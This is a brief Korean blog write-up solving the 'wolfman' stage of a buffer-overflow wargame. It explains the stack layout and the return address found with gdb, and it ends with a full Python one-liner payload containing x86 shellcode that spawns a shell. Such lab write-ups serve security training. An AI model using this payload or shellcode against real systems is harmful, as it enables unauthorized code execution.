jhyoonzi
2017. 5. 16. 23:47
전과다른건 buffer hunter 가 생겻다는 점입니다.
buffer를 0 으로 초기화하는데
문제를 푸는데 딱히 걸리지않습니다.
문제풀이는 전에 풀던 goblin과 별차이가 없습니다.
gdb를 통해 주소값을 찾고
이전과 스택도 같습니다.
nop 40 + sfp 4 + ret 4 +nop 200 + shellcode 25
로 익스하면되겟습니다.
보면 주소값은 0xbffffc80 될 것입니다.
그렇다면 바로 익스해보면
./wolfman `python -c 'print "\x90"*44 + "\x80\xfc\xff\xbf" + "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
쉘이 주어집니다.
